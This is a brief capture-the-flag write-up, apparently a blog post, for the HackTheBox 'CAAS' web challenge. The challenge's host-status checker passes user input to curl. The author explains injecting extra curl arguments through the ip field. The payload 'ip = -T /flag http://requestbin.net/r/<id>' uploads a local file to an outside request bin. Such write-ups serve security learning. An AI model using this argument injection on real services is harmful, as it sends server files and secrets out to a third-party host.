HTB CyberApocalypse CTF: CAAS

CAAS is a web-based challenge with a difficulty of two stars,

The website is used to verify the status of a host, it uses the curl command. My first impression was it might be SSRF but I remembered that we can send files using curl, but I was not sure so I did some research.

Yep, we can upload files using the curl command, I spun up a request bin instance and sent the file,

ip = -T /flag http://requestbin.net/r/<id>

We can find the flag in the request bin logs.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store